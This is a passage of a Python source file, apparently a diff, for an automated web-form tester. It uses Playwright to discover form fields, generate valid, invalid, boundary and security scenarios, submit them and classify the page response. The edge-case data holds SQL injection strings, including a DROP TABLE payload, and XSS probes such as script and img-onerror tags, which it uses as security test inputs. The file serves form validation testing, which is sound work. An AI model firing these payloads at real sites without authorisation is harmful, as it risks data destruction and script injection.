    description: str
    priority: int = 1  # 1=high, 2=medium, 3=low
|
| 49 |
+
|
| 50 |
+
@dataclass
class TestResult:
    """Represents the result of a test scenario."""
    scenario: TestScenario  # the scenario that was executed
    success: bool  # True when the actual outcome matched the expectation
    actual_result: str  # observed outcome keyword, or "error" on exception
    error_message: Optional[str] = None  # failure detail / suggested fix, if any
    screenshot_path: Optional[str] = None  # saved screenshot path, when capture succeeded
    # BUGFIX (typing): default is None, so the annotation must be Optional;
    # the old "datetime = None" contradicted itself. Callers set this to
    # datetime.now() when recording a result.
    timestamp: Optional[datetime] = None
|
| 59 |
+
|
| 60 |
+
class IntelligentFormTester:
|
| 61 |
+
"""Advanced AI-powered form testing engine."""
|
| 62 |
+
|
| 63 |
+
    def __init__(self, llm: BaseChatModel, page: Page):
        """Initialize the tester with its model, page, and built-in test data.

        Args:
            llm: chat model available for AI-assisted analysis.
            page: Playwright page hosting the form under test.
        """
        self.llm = llm
        self.page = page
        # Results populated by execute_test_scenarios().
        self.test_results: List[TestResult] = []
        # Fields populated by discover_form_fields().
        self.form_fields: List[FormField] = []
        self.error_handler = AdvancedErrorHandler(page)
        # Running counters updated as scenarios execute.
        self.testing_stats = {
            "total_tests": 0,
            "passed_tests": 0,
            "failed_tests": 0,
            "skipped_tests": 0,
            "error_tests": 0
        }

        # Test data generators
        self.valid_emails = [
            "test@example.com",
            "user@domain.org",
            "admin@company.net",
            "support@website.com"
        ]

        # Malformed addresses that a compliant validator should reject.
        self.invalid_emails = [
            "invalid-email",
            "@domain.com",
            "user@",
            "user..name@domain.com",
            "user@domain",
            "user name@domain.com",
            "user@domain..com"
        ]

        self.valid_passwords = [
            "Password123!",
            "SecurePass456@",
            "MyPassword789#",
            "TestPass2024$"
        ]

        # Passwords violating common complexity/length/whitespace policies.
        self.invalid_passwords = [
            "",  # Empty
            "123",  # Too short
            "password",  # No numbers/special chars
            "PASSWORD",  # No lowercase
            "Password",  # No numbers/special chars
            "a" * 1000,  # Too long
            "pass word",  # Contains space
            "pass\tword",  # Contains tab
            "pass\nword"  # Contains newline
        ]

        # Adversarial and boundary payloads used by security/edge scenarios.
        self.edge_case_data = {
            "sql_injection": [
                "'; DROP TABLE users; --",
                "' OR '1'='1",
                "admin'--",
                "' UNION SELECT * FROM users --"
            ],
            "xss_attempts": [
                "<script>alert('XSS')</script>",
                "javascript:alert('XSS')",
                "<img src=x onerror=alert('XSS')>",
                "';alert('XSS');//"
            ],
            "special_characters": [
                "!@#$%^&*()_+-=[]{}|;':\",./<>?",
                "测试用户",
                "مستخدم_اختبار",
                "тестовый_пользователь"
            ],
            "boundary_values": [
                "a" * 1,  # Minimum length
                "a" * 255,  # Maximum typical length
                "a" * 1000,  # Very long
                " " * 10,  # Only spaces
                "\t\n\r" * 5  # Control characters
            ]
        }
|
| 141 |
+
|
| 142 |
+
    async def discover_form_fields(self) -> List[FormField]:
        """Intelligently discover and analyze form fields on the page.

        Scans the current page for ``input``, ``textarea`` and ``select``
        elements, reads their validation-relevant attributes, and stores the
        resulting FormField list on ``self.form_fields``.

        Returns:
            The discovered fields (also cached on the instance).
        """
        logger.info("🔍 Starting intelligent form field discovery...")

        form_fields = []

        # Find all input fields
        inputs = await self.page.locator("input").all()

        for input_elem in inputs:
            try:
                # Missing type attribute defaults to "text", matching HTML.
                field_type = await input_elem.get_attribute("type") or "text"
                name = await input_elem.get_attribute("name") or ""
                placeholder = await input_elem.get_attribute("placeholder") or ""
                # required is a boolean attribute: presence (any value) means True.
                required = await input_elem.get_attribute("required") is not None

                # Get validation attributes
                pattern = await input_elem.get_attribute("pattern")
                min_length = await input_elem.get_attribute("minlength")
                max_length = await input_elem.get_attribute("maxlength")

                # Convert to appropriate types
                min_length = int(min_length) if min_length else None
                max_length = int(max_length) if max_length else None

                # Get select options if it's a select field
                # NOTE(review): an <input> element's "type" attribute is never
                # "select-one"/"select-multiple" (those are DOM .type values of
                # <select>), so this branch appears unreachable here — selects
                # are handled separately below. Confirm before relying on it.
                options = []
                if field_type == "select-one" or field_type == "select-multiple":
                    option_elements = await input_elem.locator("option").all()
                    for opt in option_elements:
                        value = await opt.get_attribute("value")
                        text = await opt.text_content()
                        if value:
                            options.append(value)
                        elif text:
                            options.append(text.strip())

                field = FormField(
                    element=input_elem,
                    field_type=field_type,
                    name=name,
                    placeholder=placeholder,
                    required=required,
                    validation_pattern=pattern,
                    min_length=min_length,
                    max_length=max_length,
                    options=options if options else None
                )

                form_fields.append(field)
                logger.info(f"📝 Discovered field: {field_type} - {name} ({placeholder})")

            except Exception as e:
                # Use advanced error handler for detailed error information
                detailed_error = await self.error_handler.handle_action_error(
                    error=e,
                    action="discover_form_field",
                    element_index=len(form_fields),
                    element_selector="input",
                    input_value=None
                )
                logger.warning(f"⚠️ Error analyzing input field: {detailed_error.suggested_fix}")
                continue

        # Find textarea fields
        textareas = await self.page.locator("textarea").all()
        for textarea in textareas:
            try:
                name = await textarea.get_attribute("name") or ""
                placeholder = await textarea.get_attribute("placeholder") or ""
                required = await textarea.get_attribute("required") is not None

                field = FormField(
                    element=textarea,
                    field_type="textarea",
                    name=name,
                    placeholder=placeholder,
                    required=required
                )

                form_fields.append(field)
                logger.info(f"📝 Discovered textarea: {name} ({placeholder})")

            except Exception as e:
                logger.warning(f"⚠️ Error analyzing textarea: {e}")
                continue

        # Find select fields
        selects = await self.page.locator("select").all()
        for select in selects:
            try:
                name = await select.get_attribute("name") or ""
                # Selects have no placeholder; fall back to aria-label text.
                placeholder = await select.get_attribute("aria-label") or ""
                required = await select.get_attribute("required") is not None

                options: List[str] = []
                try:
                    option_elements = await select.locator("option").all()
                    for opt in option_elements:
                        value = await opt.get_attribute("value")
                        text = await opt.text_content()
                        # Prefer the option's value attribute; fall back to
                        # its visible text when value is empty/missing.
                        if value:
                            options.append(value)
                        elif text:
                            options.append(text.strip())
                except Exception as e:
                    # Best-effort: a select with unreadable options is still recorded.
                    logger.debug(f"Failed to read select options: {e}")

                field = FormField(
                    element=select,
                    field_type="select",
                    name=name,
                    placeholder=placeholder,
                    required=required,
                    options=options if options else None
                )

                form_fields.append(field)
                logger.info(f"📝 Discovered select: {name} (options={len(options)})")

            except Exception as e:
                logger.warning(f"⚠️ Error analyzing select: {e}")
                continue

        self.form_fields = form_fields
        logger.info(f"✅ Form discovery complete: {len(form_fields)} fields found")
        return form_fields
|
| 269 |
+
|
| 270 |
+
async def generate_test_scenarios(self) -> List[TestScenario]:
|
| 271 |
+
"""Generate comprehensive test scenarios based on discovered fields."""
|
| 272 |
+
logger.info("🧠 Generating intelligent test scenarios...")
|
| 273 |
+
|
| 274 |
+
scenarios = []
|
| 275 |
+
|
| 276 |
+
for field in self.form_fields:
|
| 277 |
+
field_scenarios = await self._generate_field_scenarios(field)
|
| 278 |
+
scenarios.extend(field_scenarios)
|
| 279 |
+
|
| 280 |
+
# Add cross-field validation scenarios
|
| 281 |
+
cross_field_scenarios = await self._generate_cross_field_scenarios()
|
| 282 |
+
scenarios.extend(cross_field_scenarios)
|
| 283 |
+
|
| 284 |
+
# Add security testing scenarios
|
| 285 |
+
security_scenarios = await self._generate_security_scenarios()
|
| 286 |
+
scenarios.extend(security_scenarios)
|
| 287 |
+
|
| 288 |
+
logger.info(f"✅ Generated {len(scenarios)} test scenarios")
|
| 289 |
+
return scenarios
|
| 290 |
+
|
| 291 |
+
async def _generate_field_scenarios(self, field: FormField) -> List[TestScenario]:
|
| 292 |
+
"""Generate test scenarios for a specific field."""
|
| 293 |
+
scenarios = []
|
| 294 |
+
|
| 295 |
+
# Determine appropriate test data based on field type
|
| 296 |
+
if field.field_type in ["email", "text"] and "email" in field.name.lower():
|
| 297 |
+
# Email field scenarios
|
| 298 |
+
scenarios.extend([
|
| 299 |
+
TestScenario(
|
| 300 |
+
name=f"Valid Email - {field.name}",
|
| 301 |
+
data={field.name: random.choice(self.valid_emails)},
|
| 302 |
+
expected_result="success",
|
| 303 |
+
description="Test with valid email format",
|
| 304 |
+
priority=1
|
| 305 |
+
),
|
| 306 |
+
TestScenario(
|
| 307 |
+
name=f"Invalid Email - {field.name}",
|
| 308 |
+
data={field.name: random.choice(self.invalid_emails)},
|
| 309 |
+
expected_result="validation_error",
|
| 310 |
+
description="Test with invalid email format",
|
| 311 |
+
priority=1
|
| 312 |
+
),
|
| 313 |
+
TestScenario(
|
| 314 |
+
name=f"Empty Email - {field.name}",
|
| 315 |
+
data={field.name: ""},
|
| 316 |
+
expected_result="required_error" if field.required else "success",
|
| 317 |
+
description="Test with empty email field",
|
| 318 |
+
priority=1
|
| 319 |
+
)
|
| 320 |
+
])
|
| 321 |
+
|
| 322 |
+
elif field.field_type == "password":
|
| 323 |
+
# Password field scenarios
|
| 324 |
+
scenarios.extend([
|
| 325 |
+
TestScenario(
|
| 326 |
+
name=f"Valid Password - {field.name}",
|
| 327 |
+
data={field.name: random.choice(self.valid_passwords)},
|
| 328 |
+
expected_result="success",
|
| 329 |
+
description="Test with valid password",
|
| 330 |
+
priority=1
|
| 331 |
+
),
|
| 332 |
+
TestScenario(
|
| 333 |
+
name=f"Invalid Password - {field.name}",
|
| 334 |
+
data={field.name: random.choice(self.invalid_passwords)},
|
| 335 |
+
expected_result="validation_error",
|
| 336 |
+
description="Test with invalid password",
|
| 337 |
+
priority=1
|
| 338 |
+
),
|
| 339 |
+
TestScenario(
|
| 340 |
+
name=f"Empty Password - {field.name}",
|
| 341 |
+
data={field.name: ""},
|
| 342 |
+
expected_result="required_error" if field.required else "success",
|
| 343 |
+
description="Test with empty password field",
|
| 344 |
+
priority=1
|
| 345 |
+
)
|
| 346 |
+
])
|
| 347 |
+
|
| 348 |
+
elif field.field_type in ["text", "textarea"]:
|
| 349 |
+
# General text field scenarios
|
| 350 |
+
scenarios.extend([
|
| 351 |
+
TestScenario(
|
| 352 |
+
name=f"Valid Text - {field.name}",
|
| 353 |
+
data={field.name: "Valid Test Data"},
|
| 354 |
+
expected_result="success",
|
| 355 |
+
description="Test with valid text input",
|
| 356 |
+
priority=2
|
| 357 |
+
),
|
| 358 |
+
TestScenario(
|
| 359 |
+
name=f"Empty Text - {field.name}",
|
| 360 |
+
data={field.name: ""},
|
| 361 |
+
expected_result="required_error" if field.required else "success",
|
| 362 |
+
description="Test with empty text field",
|
| 363 |
+
priority=1
|
| 364 |
+
),
|
| 365 |
+
TestScenario(
|
| 366 |
+
name=f"Special Characters - {field.name}",
|
| 367 |
+
data={field.name: random.choice(self.edge_case_data["special_characters"])},
|
| 368 |
+
expected_result="validation_error",
|
| 369 |
+
description="Test with special characters",
|
| 370 |
+
priority=2
|
| 371 |
+
)
|
| 372 |
+
])
|
| 373 |
+
|
| 374 |
+
# i18n, emoji, RTL, whitespace
|
| 375 |
+
scenarios.extend([
|
| 376 |
+
TestScenario(
|
| 377 |
+
name=f"Unicode i18n - {field.name}",
|
| 378 |
+
data={field.name: "测试 – تجربة – тест – परीक्षण"},
|
| 379 |
+
expected_result="success",
|
| 380 |
+
description="International characters input",
|
| 381 |
+
priority=2
|
| 382 |
+
),
|
| 383 |
+
TestScenario(
|
| 384 |
+
name=f"Emoji Input - {field.name}",
|
| 385 |
+
data={field.name: "😀🔥✨🚀"},
|
| 386 |
+
expected_result="success",
|
| 387 |
+
description="Emoji characters",
|
| 388 |
+
priority=3
|
| 389 |
+
),
|
| 390 |
+
TestScenario(
|
| 391 |
+
name=f"RTL Text - {field.name}",
|
| 392 |
+
data={field.name: "مرحبا بالعالم"},
|
| 393 |
+
expected_result="success",
|
| 394 |
+
description="Right-to-left language",
|
| 395 |
+
priority=3
|
| 396 |
+
),
|
| 397 |
+
TestScenario(
|
| 398 |
+
name=f"Whitespace Only - {field.name}",
|
| 399 |
+
data={field.name: " "},
|
| 400 |
+
expected_result="validation_error" if field.required else "success",
|
| 401 |
+
description="Spaces only",
|
| 402 |
+
priority=2
|
| 403 |
+
)
|
| 404 |
+
])
|
| 405 |
+
|
| 406 |
+
elif field.field_type in ["number"]:
|
| 407 |
+
scenarios.extend([
|
| 408 |
+
TestScenario(
|
| 409 |
+
name=f"Valid Number - {field.name}",
|
| 410 |
+
data={field.name: "123"},
|
| 411 |
+
expected_result="success",
|
| 412 |
+
description="Valid numeric input",
|
| 413 |
+
priority=2
|
| 414 |
+
),
|
| 415 |
+
TestScenario(
|
| 416 |
+
name=f"Negative Number - {field.name}",
|
| 417 |
+
data={field.name: "-5"},
|
| 418 |
+
expected_result="validation_error",
|
| 419 |
+
description="Negative value",
|
| 420 |
+
priority=2
|
| 421 |
+
),
|
| 422 |
+
TestScenario(
|
| 423 |
+
name=f"Non-numeric - {field.name}",
|
| 424 |
+
data={field.name: "abc"},
|
| 425 |
+
expected_result="validation_error",
|
| 426 |
+
description="Alphabetic in number field",
|
| 427 |
+
priority=1
|
| 428 |
+
)
|
| 429 |
+
])
|
| 430 |
+
|
| 431 |
+
elif field.field_type in ["url"]:
|
| 432 |
+
scenarios.extend([
|
| 433 |
+
TestScenario(
|
| 434 |
+
name=f"Valid URL - {field.name}",
|
| 435 |
+
data={field.name: "https://example.com"},
|
| 436 |
+
expected_result="success",
|
| 437 |
+
description="Valid URL",
|
| 438 |
+
priority=2
|
| 439 |
+
),
|
| 440 |
+
TestScenario(
|
| 441 |
+
name=f"Invalid URL - {field.name}",
|
| 442 |
+
data={field.name: "htp:/bad"},
|
| 443 |
+
expected_result="validation_error",
|
| 444 |
+
description="Malformed URL",
|
| 445 |
+
priority=1
|
| 446 |
+
)
|
| 447 |
+
])
|
| 448 |
+
|
| 449 |
+
elif field.field_type in ["tel"]:
|
| 450 |
+
scenarios.extend([
|
| 451 |
+
TestScenario(
|
| 452 |
+
name=f"Valid Tel - {field.name}",
|
| 453 |
+
data={field.name: "+1-202-555-0188"},
|
| 454 |
+
expected_result="success",
|
| 455 |
+
description="Valid phone",
|
| 456 |
+
priority=3
|
| 457 |
+
),
|
| 458 |
+
TestScenario(
|
| 459 |
+
name=f"Invalid Tel - {field.name}",
|
| 460 |
+
data={field.name: "abcd-123"},
|
| 461 |
+
expected_result="validation_error",
|
| 462 |
+
description="Invalid phone",
|
| 463 |
+
priority=2
|
| 464 |
+
)
|
| 465 |
+
])
|
| 466 |
+
|
| 467 |
+
elif field.field_type in ["date", "time", "datetime-local", "month", "week"]:
|
| 468 |
+
scenarios.extend([
|
| 469 |
+
TestScenario(
|
| 470 |
+
name=f"Valid {field.field_type} - {field.name}",
|
| 471 |
+
data={field.name: "2025-01-15" if field.field_type=="date" else ("12:34" if field.field_type=="time" else "2025-01-15T12:34")},
|
| 472 |
+
expected_result="success",
|
| 473 |
+
description="Valid date/time",
|
| 474 |
+
priority=3
|
| 475 |
+
),
|
| 476 |
+
TestScenario(
|
| 477 |
+
name=f"Invalid {field.field_type} - {field.name}",
|
| 478 |
+
data={field.name: "invalid"},
|
| 479 |
+
expected_result="validation_error",
|
| 480 |
+
description="Invalid date/time format",
|
| 481 |
+
priority=2
|
| 482 |
+
)
|
| 483 |
+
])
|
| 484 |
+
|
| 485 |
+
elif field.field_type in ["checkbox"]:
|
| 486 |
+
scenarios.extend([
|
| 487 |
+
TestScenario(
|
| 488 |
+
name=f"Check Checkbox - {field.name}",
|
| 489 |
+
data={field.name: True},
|
| 490 |
+
expected_result="success",
|
| 491 |
+
description="Toggle on",
|
| 492 |
+
priority=3
|
| 493 |
+
),
|
| 494 |
+
TestScenario(
|
| 495 |
+
name=f"Uncheck Checkbox - {field.name}",
|
| 496 |
+
data={field.name: False},
|
| 497 |
+
expected_result="success",
|
| 498 |
+
description="Toggle off",
|
| 499 |
+
priority=3
|
| 500 |
+
)
|
| 501 |
+
])
|
| 502 |
+
|
| 503 |
+
elif field.field_type in ["radio"]:
|
| 504 |
+
scenarios.append(TestScenario(
|
| 505 |
+
name=f"Select Radio - {field.name}",
|
| 506 |
+
data={field.name: True},
|
| 507 |
+
expected_result="success",
|
| 508 |
+
description="Select radio option",
|
| 509 |
+
priority=3
|
| 510 |
+
))
|
| 511 |
+
|
| 512 |
+
elif field.field_type in ["file"]:
|
| 513 |
+
scenarios.extend([
|
| 514 |
+
TestScenario(
|
| 515 |
+
name=f"Upload Small File - {field.name}",
|
| 516 |
+
data={field.name: "./tmp/test-small.txt"},
|
| 517 |
+
expected_result="success",
|
| 518 |
+
description="Upload small text file",
|
| 519 |
+
priority=2
|
| 520 |
+
),
|
| 521 |
+
TestScenario(
|
| 522 |
+
name=f"Upload Large File - {field.name}",
|
| 523 |
+
data={field.name: "./tmp/test-large.bin"},
|
| 524 |
+
expected_result="validation_error",
|
| 525 |
+
description="Upload large file beyond limit (if enforced)",
|
| 526 |
+
priority=2
|
| 527 |
+
)
|
| 528 |
+
])
|
| 529 |
+
|
| 530 |
+
# Add boundary testing
|
| 531 |
+
if field.min_length or field.max_length:
|
| 532 |
+
scenarios.extend(await self._generate_boundary_scenarios(field))
|
| 533 |
+
|
| 534 |
+
return scenarios
|
| 535 |
+
|
| 536 |
+
async def _generate_boundary_scenarios(self, field: FormField) -> List[TestScenario]:
|
| 537 |
+
"""Generate boundary value test scenarios."""
|
| 538 |
+
scenarios = []
|
| 539 |
+
|
| 540 |
+
if field.min_length:
|
| 541 |
+
scenarios.append(TestScenario(
|
| 542 |
+
name=f"Min Length - {field.name}",
|
| 543 |
+
data={field.name: "a" * (field.min_length - 1)},
|
| 544 |
+
expected_result="validation_error",
|
| 545 |
+
description=f"Test with length below minimum ({field.min_length - 1})",
|
| 546 |
+
priority=1
|
| 547 |
+
))
|
| 548 |
+
|
| 549 |
+
scenarios.append(TestScenario(
|
| 550 |
+
name=f"Exact Min Length - {field.name}",
|
| 551 |
+
data={field.name: "a" * field.min_length},
|
| 552 |
+
expected_result="success",
|
| 553 |
+
description=f"Test with exact minimum length ({field.min_length})",
|
| 554 |
+
priority=1
|
| 555 |
+
))
|
| 556 |
+
|
| 557 |
+
if field.max_length:
|
| 558 |
+
scenarios.append(TestScenario(
|
| 559 |
+
name=f"Exact Max Length - {field.name}",
|
| 560 |
+
data={field.name: "a" * field.max_length},
|
| 561 |
+
expected_result="success",
|
| 562 |
+
description=f"Test with exact maximum length ({field.max_length})",
|
| 563 |
+
priority=1
|
| 564 |
+
))
|
| 565 |
+
|
| 566 |
+
scenarios.append(TestScenario(
|
| 567 |
+
name=f"Exceed Max Length - {field.name}",
|
| 568 |
+
data={field.name: "a" * (field.max_length + 1)},
|
| 569 |
+
expected_result="validation_error",
|
| 570 |
+
description=f"Test with length exceeding maximum ({field.max_length + 1})",
|
| 571 |
+
priority=1
|
| 572 |
+
))
|
| 573 |
+
|
| 574 |
+
return scenarios
|
| 575 |
+
|
| 576 |
+
async def _generate_cross_field_scenarios(self) -> List[TestScenario]:
|
| 577 |
+
"""Generate scenarios that test cross-field validation."""
|
| 578 |
+
scenarios = []
|
| 579 |
+
|
| 580 |
+
# Find email and password fields
|
| 581 |
+
email_fields = [f for f in self.form_fields if "email" in f.name.lower() and f.field_type in ["email", "text"]]
|
| 582 |
+
password_fields = [f for f in self.form_fields if f.field_type == "password"]
|
| 583 |
+
|
| 584 |
+
if email_fields and password_fields:
|
| 585 |
+
# Test with matching valid credentials
|
| 586 |
+
scenarios.append(TestScenario(
|
| 587 |
+
name="Valid Login Credentials",
|
| 588 |
+
data={
|
| 589 |
+
email_fields[0].name: random.choice(self.valid_emails),
|
| 590 |
+
password_fields[0].name: random.choice(self.valid_passwords)
|
| 591 |
+
},
|
| 592 |
+
expected_result="success",
|
| 593 |
+
description="Test with valid email and password combination",
|
| 594 |
+
priority=1
|
| 595 |
+
))
|
| 596 |
+
|
| 597 |
+
# Test with mismatched credentials
|
| 598 |
+
scenarios.append(TestScenario(
|
| 599 |
+
name="Invalid Login Credentials",
|
| 600 |
+
data={
|
| 601 |
+
email_fields[0].name: random.choice(self.valid_emails),
|
| 602 |
+
password_fields[0].name: "WrongPassword123!"
|
| 603 |
+
},
|
| 604 |
+
expected_result="authentication_error",
|
| 605 |
+
description="Test with valid email but wrong password",
|
| 606 |
+
priority=1
|
| 607 |
+
))
|
| 608 |
+
|
| 609 |
+
return scenarios
|
| 610 |
+
|
| 611 |
+
async def _generate_security_scenarios(self) -> List[TestScenario]:
|
| 612 |
+
"""Generate security testing scenarios."""
|
| 613 |
+
scenarios = []
|
| 614 |
+
|
| 615 |
+
for field in self.form_fields:
|
| 616 |
+
if field.field_type in ["text", "email", "password", "textarea"]:
|
| 617 |
+
# SQL Injection tests
|
| 618 |
+
for sql_payload in self.edge_case_data["sql_injection"]:
|
| 619 |
+
scenarios.append(TestScenario(
|
| 620 |
+
name=f"SQL Injection - {field.name}",
|
| 621 |
+
data={field.name: sql_payload},
|
| 622 |
+
expected_result="security_error",
|
| 623 |
+
description=f"Test SQL injection protection for {field.name}",
|
| 624 |
+
priority=1
|
| 625 |
+
))
|
| 626 |
+
|
| 627 |
+
# XSS tests
|
| 628 |
+
for xss_payload in self.edge_case_data["xss_attempts"]:
|
| 629 |
+
scenarios.append(TestScenario(
|
| 630 |
+
name=f"XSS Attempt - {field.name}",
|
| 631 |
+
data={field.name: xss_payload},
|
| 632 |
+
expected_result="security_error",
|
| 633 |
+
description=f"Test XSS protection for {field.name}",
|
| 634 |
+
priority=1
|
| 635 |
+
))
|
| 636 |
+
|
| 637 |
+
return scenarios
|
| 638 |
+
|
| 639 |
+
async def execute_test_scenarios(self, scenarios: List[TestScenario]) -> List[TestResult]:
|
| 640 |
+
"""Execute all test scenarios and collect results."""
|
| 641 |
+
logger.info(f"🚀 Executing {len(scenarios)} test scenarios...")
|
| 642 |
+
|
| 643 |
+
results = []
|
| 644 |
+
self.testing_stats["total_tests"] = len(scenarios)
|
| 645 |
+
|
| 646 |
+
for i, scenario in enumerate(scenarios, 1):
|
| 647 |
+
logger.info(f"📋 Running scenario {i}/{len(scenarios)}: {scenario.name}")
|
| 648 |
+
|
| 649 |
+
try:
|
| 650 |
+
result = await self._execute_single_scenario(scenario)
|
| 651 |
+
results.append(result)
|
| 652 |
+
|
| 653 |
+
# Update statistics
|
| 654 |
+
if result.success:
|
| 655 |
+
self.testing_stats["passed_tests"] += 1
|
| 656 |
+
elif result.error_message:
|
| 657 |
+
self.testing_stats["error_tests"] += 1
|
| 658 |
+
else:
|
| 659 |
+
self.testing_stats["failed_tests"] += 1
|
| 660 |
+
|
| 661 |
+
# Add delay between tests to avoid overwhelming the server
|
| 662 |
+
await asyncio.sleep(1)
|
| 663 |
+
|
| 664 |
+
except Exception as e:
|
| 665 |
+
# Use advanced error handler for detailed error information
|
| 666 |
+
detailed_error = await self.error_handler.handle_action_error(
|
| 667 |
+
error=e,
|
| 668 |
+
action="execute_test_scenario",
|
| 669 |
+
element_index=None,
|
| 670 |
+
element_selector=None,
|
| 671 |
+
input_value=scenario.name
|
| 672 |
+
)
|
| 673 |
+
|
| 674 |
+
logger.error(f"❌ Error executing scenario {scenario.name}: {detailed_error.suggested_fix}")
|
| 675 |
+
|
| 676 |
+
# Attempt error recovery
|
| 677 |
+
recovery_success = await self.error_handler.attempt_error_recovery(detailed_error)
|
| 678 |
+
if recovery_success:
|
| 679 |
+
logger.info(f"🔄 Recovery successful for scenario: {scenario.name}")
|
| 680 |
+
try:
|
| 681 |
+
result = await self._execute_single_scenario(scenario)
|
| 682 |
+
results.append(result)
|
| 683 |
+
self.testing_stats["passed_tests"] += 1
|
| 684 |
+
continue
|
| 685 |
+
except:
|
| 686 |
+
pass
|
| 687 |
+
|
| 688 |
+
results.append(TestResult(
|
| 689 |
+
scenario=scenario,
|
| 690 |
+
success=False,
|
| 691 |
+
actual_result="error",
|
| 692 |
+
error_message=f"{str(e)}\n\nSuggested Fix:\n{detailed_error.suggested_fix}",
|
| 693 |
+
timestamp=datetime.now()
|
| 694 |
+
))
|
| 695 |
+
self.testing_stats["error_tests"] += 1
|
| 696 |
+
|
| 697 |
+
self.test_results = results
|
| 698 |
+
logger.info(f"✅ Test execution complete: {len(results)} results collected")
|
| 699 |
+
logger.info(f"📊 Test Statistics: {self.testing_stats}")
|
| 700 |
+
return results
|
| 701 |
+
|
| 702 |
+
async def _execute_single_scenario(self, scenario: TestScenario) -> TestResult:
    """Execute one test scenario: fill the form, submit it, classify the outcome.

    Args:
        scenario: Scenario holding the per-field test data and expected result.

    Returns:
        A TestResult with success flag, observed outcome label, optional
        screenshot path, and timestamp. Never raises — every failure is
        folded into an "error" TestResult.
    """
    try:
        # Start from a clean slate so a previous scenario's values
        # cannot leak into this one.
        await self._clear_all_fields()

        # Fill the form with this scenario's test data.
        for field_name, value in scenario.data.items():
            field = next((f for f in self.form_fields if f.name == field_name), None)
            if field:
                try:
                    await self._set_field_value(field, value)
                    await asyncio.sleep(0.5)  # small delay so client-side validation can fire
                except Exception as e:
                    # Record rich context for the failed fill attempt.
                    detailed_error = await self.error_handler.handle_action_error(
                        error=e,
                        action="fill_field",
                        element_index=None,
                        element_selector=f"[name='{field_name}']",
                        input_value=str(value)
                    )
                    logger.warning(f"⚠️ Error setting field '{field_name}': {detailed_error.suggested_fix}")
                    # Fallback: click + type works for some widgets that reject fill().
                    try:
                        await field.element.click()
                        await field.element.type(str(value))
                    except Exception:  # was a bare except: — narrowed so KeyboardInterrupt etc. propagate
                        logger.error(f"❌ Fallback typing failed for '{field_name}'")

        # Capture the filled form before submission, for the report.
        screenshot_path = f"./screenshots/test_{scenario.name.replace(' ', '_')}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.png"
        try:
            await self.page.screenshot(path=screenshot_path)
        except Exception as e:
            logger.warning(f"⚠️ Failed to take screenshot: {e}")
            screenshot_path = None

        # Submit the form. NOTE: Locator.first is a property in Playwright's
        # Python API, so it must NOT be awaited (the original `await ...first`
        # raised a TypeError).
        submit_button = self.page.locator("button[type='submit'], input[type='submit']").first
        if await submit_button.count() > 0:
            try:
                await submit_button.click()
                await asyncio.sleep(2)  # wait for the server response / navigation
            except Exception as e:
                detailed_error = await self.error_handler.handle_action_error(
                    error=e,
                    action="click_submit",
                    element_index=None,
                    element_selector="button[type='submit'], input[type='submit']",
                    input_value=None
                )
                logger.warning(f"⚠️ Error clicking submit button: {detailed_error.suggested_fix}")

        # Classify the page state after submission.
        actual_result = await self._analyze_form_result()

        # Compare observed vs. expected outcome.
        success = self._evaluate_test_result(scenario, actual_result)

        return TestResult(
            scenario=scenario,
            success=success,
            actual_result=actual_result,
            screenshot_path=screenshot_path,
            timestamp=datetime.now()
        )

    except Exception as e:
        # Any unexpected failure becomes an "error" TestResult with a
        # suggested fix attached, instead of propagating to the caller.
        detailed_error = await self.error_handler.handle_action_error(
            error=e,
            action="execute_single_scenario",
            element_index=None,
            element_selector=None,
            input_value=scenario.name
        )

        return TestResult(
            scenario=scenario,
            success=False,
            actual_result="error",
            error_message=f"{str(e)}\n\nDetailed Error Information:\n{detailed_error.suggested_fix}",
            timestamp=datetime.now()
        )
|
| 787 |
+
|
| 788 |
+
async def _set_field_value(self, field: FormField, value: Any):
    """Set a form field's value according to its input type.

    Supports text-like inputs, selects (by option value, falling back to
    visible label), checkboxes, radios, and file inputs; unrecognized
    types fall back to fill().

    Args:
        field: FormField wrapper holding the Playwright element handle.
        value: Value to apply; coerced to str for most types, interpreted
            as a truthy flag for checkboxes.
    """
    t = (field.field_type or "").lower()
    elem = field.element
    text_like = {
        "text", "email", "password", "url", "tel", "search", "textarea",
        "number", "date", "time", "datetime-local", "month", "week",
    }
    if t in text_like:
        await elem.fill(str(value))
    elif t in ("select", "select-one", "select-multiple"):
        # Prefer selecting by option value; fall back to the visible label.
        try:
            await elem.select_option(str(value))
        except Exception:
            await elem.select_option(label=str(value))
    elif t == "checkbox":
        # force=True bypasses actionability checks for styled/hidden checkboxes.
        if bool(value):
            await elem.check(force=True)
        else:
            await elem.uncheck(force=True)
    elif t == "radio":
        await elem.check(force=True)
    elif t == "file":
        # Let upload errors propagate directly (the original wrapped this in
        # a try/except that only re-raised, which added nothing).
        await elem.set_input_files(str(value))
    else:
        # Unknown type: best effort via fill().
        await elem.fill(str(value))
|
| 817 |
+
|
| 818 |
+
async def _clear_all_fields(self):
    """Best-effort clear of every discovered form field.

    Failures are deliberately ignored: some field types (file inputs,
    radios) do not support clear(), and a failed clear must not abort
    the scenario. The original used a bare ``except:``, which would also
    swallow KeyboardInterrupt/SystemExit — narrowed to Exception.
    """
    for field in self.form_fields:
        try:
            await field.element.clear()
        except Exception:
            pass
|
| 825 |
+
|
| 826 |
+
async def _analyze_form_result(self) -> str:
    """Classify the page state after a form submission.

    Matches keywords against the lowercased page HTML and returns one of
    "success", "validation_error", "security_error", "unknown", or
    "error" (when the page content cannot be read). Categories are
    checked in order, so success keywords take precedence.
    """
    keyword_categories = (
        ("success", (
            "success", "welcome", "dashboard", "profile", "account",
            "logged in", "signed in", "thank you", "confirmation",
        )),
        ("validation_error", (
            "error", "invalid", "incorrect", "failed", "wrong",
            "required", "missing", "not found", "denied", "blocked",
        )),
        ("security_error", (
            "security", "blocked", "suspicious", "malicious",
            "injection", "script", "xss", "sql",
        )),
    )
    try:
        page_text = (await self.page.content()).lower()
        for label, keywords in keyword_categories:
            if any(keyword in page_text for keyword in keywords):
                return label
        return "unknown"
    except Exception as e:
        logger.error(f"Error analyzing form result: {e}")
        return "error"
|
| 867 |
+
|
| 868 |
+
async def run_basic_accessibility_checks(self) -> Dict[str, Any]:
    """Run fast, dependency-free accessibility heuristics on the current page.

    Checks: images lacking alt text, buttons with no accessible name,
    form controls with neither a matching <label for=...> nor an
    aria-label, and elements using tabindex='-1'.

    Returns:
        {"issues": [...], "passed": bool} on success, or {"error": str}
        if the page could not be inspected.
    """
    findings: List[str] = []
    try:
        # 1) Images missing alt text.
